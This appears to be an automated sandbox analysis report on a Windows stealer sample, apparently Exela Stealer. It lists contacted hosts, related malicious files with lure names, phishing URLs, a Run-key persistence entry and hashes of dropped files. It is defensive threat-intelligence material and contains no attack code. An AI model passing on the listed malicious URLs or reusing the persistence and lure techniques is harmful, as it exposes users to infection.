                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                    Classification:mal100.rans.spre.phis.troj.spyw.evad.winEXE@145/213@4/6
                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                    • Successful, ratio: 50%
                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                    • Successful, ratio: 89%
                                                                                                                                                                                                    • Number of executed functions: 85
                                                                                                                                                                                                    • Number of non-executed functions: 115
                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): Conhost.exe
                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.202.57.177, 40.68.123.157, 23.72.90.76, 23.72.90.85, 20.3.187.198
                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                                    • Execution Graph export aborted for target mshta.exe, PID 7072 because there are no executed function
                                                                                                                                                                                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                    • VT rate limit hit for: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                    18:24:04AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Exela Update Service C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                    19:24:00API Interceptor6x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                    19:24:07API Interceptor7x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                    19:24:08API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    208.95.112.1Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • ip-api.com/json
                                                                                                                                                                                                    Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                    SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                    PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                    Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                    QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                    DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                    Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                    Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                    Dhl Express Shipping Docs .pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                    162.159.137.23230362LQ5.posh.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                      SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        http://www.cyclic.sh/pricingGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          T_240369_S#U0130PAR#U0130S.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                            biden.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              stub_builder.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                STRIKER.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  e.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    MNPOk988.exeGet hashmaliciousAgentTesla, Discord Token StealerBrowse
                                                                                                                                                                                                                      ZoominstallerFull.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                        162.159.128.233file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                                                                                                                                                                                                        • discord.com/phpMyAdmin/
                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        api.gofile.ioSecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                        • 151.80.29.83
                                                                                                                                                                                                                        TeaiGames.exeGet hashmaliciousNovaSentinelBrowse
                                                                                                                                                                                                                        • 51.178.66.33
                                                                                                                                                                                                                        SecuriteInfo.com.Win64.Evo-gen.10533.31255.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 51.38.43.18
                                                                                                                                                                                                                        TiKj3IVDj4.exeGet hashmaliciousMint StealerBrowse
                                                                                                                                                                                                                        • 51.38.43.18
                                                                                                                                                                                                                        TiKj3IVDj4.exeGet hashmaliciousMint StealerBrowse
                                                                                                                                                                                                                        • 51.178.66.33
                                                                                                                                                                                                                        SecuriteInfo.com.Python.Stealer.1447.10844.3562.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                                                                                                                                                                        • 51.178.66.33
                                                                                                                                                                                                                        SecuriteInfo.com.W64.S-19146458.Eldorado.2165.28638.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 51.38.43.18
                                                                                                                                                                                                                        SecuriteInfo.com.W64.S-19146458.Eldorado.2165.28638.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 51.178.66.33
                                                                                                                                                                                                                        SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 51.38.43.18
                                                                                                                                                                                                                        SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 51.38.43.18
                                                                                                                                                                                                                        store8.gofile.ioTeaiGames.exeGet hashmaliciousNovaSentinelBrowse
                                                                                                                                                                                                                        • 206.168.191.31
                                                                                                                                                                                                                        e.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 206.168.191.31
                                                                                                                                                                                                                        Leak Porn MMS Teen Girl.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 206.168.191.31
                                                                                                                                                                                                                        My Nude Video MMS.jsGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 206.168.191.31
                                                                                                                                                                                                                        Setup.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                                                                                                                                        • 31.14.70.242
                                                                                                                                                                                                                        file.exeGet hashmaliciousRHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                        • 31.14.70.242
                                                                                                                                                                                                                        file.exeGet hashmaliciousDanaBot, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                        • 31.14.70.242
                                                                                                                                                                                                                        file.exeGet hashmaliciousRHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                        • 31.14.70.242
                                                                                                                                                                                                                        file.exeGet hashmaliciousFabookie, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                        • 31.14.70.242
                                                                                                                                                                                                                        file.exeGet hashmaliciousFabookie, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                        • 31.14.70.242
                                                                                                                                                                                                                        ip-api.comControl-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Dhl Express Shipping Docs .pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        discord.comSecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                        • 162.159.138.232
                                                                                                                                                                                                                        SecuriteInfo.com.Win64.Evo-gen.10533.31255.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.159.136.232
                                                                                                                                                                                                                        z158xIuvhauCQiddTe.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 162.159.136.232
                                                                                                                                                                                                                        SecuriteInfo.com.Python.Stealer.1447.10844.3562.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                                                                                                                                                                        • 162.159.136.232
                                                                                                                                                                                                                        4PPlLk8IT5.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                        • 162.159.128.233
                                                                                                                                                                                                                        malware!!!.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.159.138.232
                                                                                                                                                                                                                        ZYzAYcYZ.posh.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.159.128.233
                                                                                                                                                                                                                        RKeUGmUe.posh.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.159.135.232
                                                                                                                                                                                                                        MkVtrMLG.posh.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.159.135.232
                                                                                                                                                                                                                        hqqLkX16.posh.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.159.128.233
                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        MASSIVE-NETWORKSUSTeaiGames.exeGet hashmaliciousNovaSentinelBrowse
                                                                                                                                                                                                                        • 206.168.191.31
                                                                                                                                                                                                                        a2Mng2JPCI.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                        • 207.174.78.113
                                                                                                                                                                                                                        TeaiGames.exeGet hashmaliciousNovaSentinelBrowse
                                                                                                                                                                                                                        • 206.168.190.239
                                                                                                                                                                                                                        Mauqes.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 206.168.190.239
                                                                                                                                                                                                                        e.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 206.168.190.239
                                                                                                                                                                                                                        e.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 206.168.190.239
                                                                                                                                                                                                                        e.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 206.168.190.239
                                                                                                                                                                                                                        e.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 206.168.190.239
                                                                                                                                                                                                                        Leak Porn MMS Teen Girl.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 206.168.191.31
                                                                                                                                                                                                                        erg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 206.168.190.239
                                                                                                                                                                                                                        CLOUDFLARENETUShttps://menziesaviation.perspectivefunnel.com/6627e317d6513900142546ad/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                        • 104.17.2.184
                                                                                                                                                                                                                        lzShU2RYJa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                                                        • 172.67.139.220
                                                                                                                                                                                                                        https://runrun.it/share/form/0SRuaDvcQOCgwT9FGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                                                        https://u43997916.ct.sendgrid.net/ls/click?upn=u001.8-2Bu6iTAOb-2FcpkRnZlUIEsFX12VujJLkoH2yCHZQsWjupenpr7B6ykMomuFAeFzXVNSonRr-2FISOMHDDlMnH1PDQ-3D-3Dwo0m_siaPD1JbayxF6TPhGtuaBQC3EhYPEfBWE2CMcyur3sLmOuN6D0k7B9uB2d6lG3eyRcBDD5pIxMQgneoQJNokqAOvFY6J9Uhi-2F6PSDYFQgIMLXof1fdbPFYjo0m-2FpFL9TPBTZH5ISgAZIHA-2FCPZVhL9H6tn4iThoVMhFZMrkPXsKcqiolaF6RpZbFxs8-2FULT4Cp2J1vOfk5-2ByygSilfGdRwfCb868apzApUM5bXVvPhI-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 104.17.2.184
                                                                                                                                                                                                                        http://ncdocvault.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 172.67.147.238
                                                                                                                                                                                                                        XV9q6mY4DI.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                                                                                        • 104.21.65.24
                                                                                                                                                                                                                        https://app.frame.io/presentations/da0e116a-d15f-430f-8c37-0aa7d783720f?component_clicked=digest_call_to_action&email_id=8abc710c-c18f-47f5-a884-e927cb8dcfaa&email_type=pending-reviewer-inviteGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 104.21.44.137
                                                                                                                                                                                                                        https://btcpike.topGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.18.28.104
                                                                                                                                                                                                                        n8XBpFdVFU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                                                                                                                                        • 172.67.139.220
                                                                                                                                                                                                                        R5391762lf.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                                                        • 172.67.139.220
                                                                                                                                                                                                                        TUT-ASUSControl-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Dhl Express Shipping Docs .pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        CLOUDFLARENETUShttps://menziesaviation.perspectivefunnel.com/6627e317d6513900142546ad/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                        • 104.17.2.184
                                                                                                                                                                                                                        lzShU2RYJa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                                                        • 172.67.139.220
                                                                                                                                                                                                                        https://runrun.it/share/form/0SRuaDvcQOCgwT9FGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                                                        https://u43997916.ct.sendgrid.net/ls/click?upn=u001.8-2Bu6iTAOb-2FcpkRnZlUIEsFX12VujJLkoH2yCHZQsWjupenpr7B6ykMomuFAeFzXVNSonRr-2FISOMHDDlMnH1PDQ-3D-3Dwo0m_siaPD1JbayxF6TPhGtuaBQC3EhYPEfBWE2CMcyur3sLmOuN6D0k7B9uB2d6lG3eyRcBDD5pIxMQgneoQJNokqAOvFY6J9Uhi-2F6PSDYFQgIMLXof1fdbPFYjo0m-2FpFL9TPBTZH5ISgAZIHA-2FCPZVhL9H6tn4iThoVMhFZMrkPXsKcqiolaF6RpZbFxs8-2FULT4Cp2J1vOfk5-2ByygSilfGdRwfCb868apzApUM5bXVvPhI-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 104.17.2.184
                                                                                                                                                                                                                        http://ncdocvault.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 172.67.147.238
                                                                                                                                                                                                                        XV9q6mY4DI.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                                                                                        • 104.21.65.24
                                                                                                                                                                                                                        https://app.frame.io/presentations/da0e116a-d15f-430f-8c37-0aa7d783720f?component_clicked=digest_call_to_action&email_id=8abc710c-c18f-47f5-a884-e927cb8dcfaa&email_type=pending-reviewer-inviteGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 104.21.44.137
                                                                                                                                                                                                                        https://btcpike.topGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.18.28.104
                                                                                                                                                                                                                        n8XBpFdVFU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                                                                                                                                        • 172.67.139.220
                                                                                                                                                                                                                        R5391762lf.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                                                        • 172.67.139.220
                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI67602\_asyncio.pydsaturn.bat.exeGet hashmaliciousExela StealerBrowse
                                                                                                                                                                                                                          SecuriteInfo.com.Win64.Evo-gen.20253.17340.exeGet hashmaliciousExela StealerBrowse
                                                                                                                                                                                                                            SecuriteInfo.com.Win64.Evo-gen.20285.22431.exeGet hashmaliciousExela StealerBrowse
                                                                                                                                                                                                                              SecuriteInfo.com.Win64.Evo-gen.15998.5924.exeGet hashmaliciousExela StealerBrowse
                                                                                                                                                                                                                                SecuriteInfo.com.Win64.Evo-gen.31305.28602.exeGet hashmaliciousExela StealerBrowse
                                                                                                                                                                                                                                  9afaXJv52z.exeGet hashmaliciousExela StealerBrowse
                                                                                                                                                                                                                                    capthca-bypass.exeGet hashmaliciousExela StealerBrowse
                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI67602\VCRUNTIME140.dllSecuriteInfo.com.Win64.Evo-gen.21575.16188.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                                                        PDF Merge.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          SecuriteInfo.com.Win64.Malware-gen.18747.19997.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            DeepLSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              DeepLSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                !!@NeW_$etUp_2024_pAsSW0rds$_.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  1tQ7HC6GOS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                    stub_builder.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                        EIrPdlD2lA.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                                                                                          Entropy (8bit):1.307370104264997
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrU:KooCEYhgYEL0In
                                                                                                                                                                                                                                                          MD5:D27F468CD852815B98BF0AD19799FBC0
                                                                                                                                                                                                                                                          SHA1:ECA846699A9E12E2A63F88DAADEBA079476B6F31
                                                                                                                                                                                                                                                          SHA-256:34CD88F68DC1E351F5A7339070A8821B43C78B5348072689AE5D936F86E8F57D
                                                                                                                                                                                                                                                          SHA-512:454F06E81726B8B118354040B36A3A9EE6BF7881E019623135C87025386724F9B4C521145D6807159523BD02B1F95A5DA6BA097AB8B4007DC361B61DC843DC59
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0c7c8d00, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                                                                                          Entropy (8bit):0.4221309502865908
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
                                                                                                                                                                                                                                                          MD5:3F3253A9FE27F7AD7A9A01B8F14082BE
                                                                                                                                                                                                                                                          SHA1:79E49436846812215E4B60BDA2933055394DF167
                                                                                                                                                                                                                                                          SHA-256:571D9A0FDF4799AEDC346DF0161AA533A166CB6FD8BBAE6A8B8A443205F39DB1
                                                                                                                                                                                                                                                          SHA-512:733EF629F052627890DF0895D5C268E6067FD7A9F21F270885F4260A4679E00116BC23E706DA0A6A51CE1B2BBDB9AFFB6323D6DC85030294CB6EE8CB481C5B9B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.|..... .......A.......X\...;...{......................0.!..........{A......|1.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................O.......|1..................8.......|1..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                                                                          Entropy (8bit):0.07654035734174698
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:vJ1KYeaKZUhGjjn13a/2IZ8lAllcVO/lnlZMxZNQl:jKzZUhGj53q2k0AOewk
                                                                                                                                                                                                                                                          MD5:FB672CBC7A4CBE11D7A70CF3F43316CC
                                                                                                                                                                                                                                                          SHA1:1F3B7536CA74FE09765BED7647F2DA3E2F7F2523
                                                                                                                                                                                                                                                          SHA-256:E50BE088F58CE9382F75EFE8D6825885FB916DCFD08D16A3E60D97E5ECFB2674
                                                                                                                                                                                                                                                          SHA-512:3039D8B45443E2E0983E6F3D2AD34C60DB050E537FC2C1485041EC760DBE379192AE43451253136451D7F293A8E20E14818E40F19FFA46B2BFC4A047CB4A4AF8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:9{.......................................;...{.......|1......{A..............{A......{A..........{A].................8.......|1.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11317024
                                                                                                                                                                                                                                                          Entropy (8bit):7.996384436680205
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:196608:0GAYfPA7lz2Jp5UfLuseNvX+wfm/pf+xfdkR7c2WKsnqrIWOIW0DaqkH:LAYg7h2Jp5MivX+9/pWFGR7c2BsnqrID
                                                                                                                                                                                                                                                          MD5:D53E9B9D10AFFCF90E613ABCCC702CA2
                                                                                                                                                                                                                                                          SHA1:24849B1A515347A75804D53C483CE6DFFC78DBCC
                                                                                                                                                                                                                                                          SHA-256:0BCFADB848694EE56BF3FAD6C3A9DF4FDE2D60CD52CE2A16BE42B06FDA520812
                                                                                                                                                                                                                                                          SHA-512:12518C78D05C6BCCD7048A80BAE141D286DD241BBF55AFE6622C36E1E115018C48186A52C5FDB21D6B589461C7A619949D354045E15B5C76A2A09EBFDF392B46
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-................,..............................................Rich...................PE..d...*2(f.........."....&.....v......0..........@.........................................`.....................................................x....p..,....0...#..............X...@...................................@............... ............................text............................... ..`.rdata...........0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc...,....p......................@..@.reloc..X............ ..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                                                                                                                                                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                                                                                                                                                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                                                                                                                                                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                                                                                                                                                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                                                                                                                                                                          Malicious:false
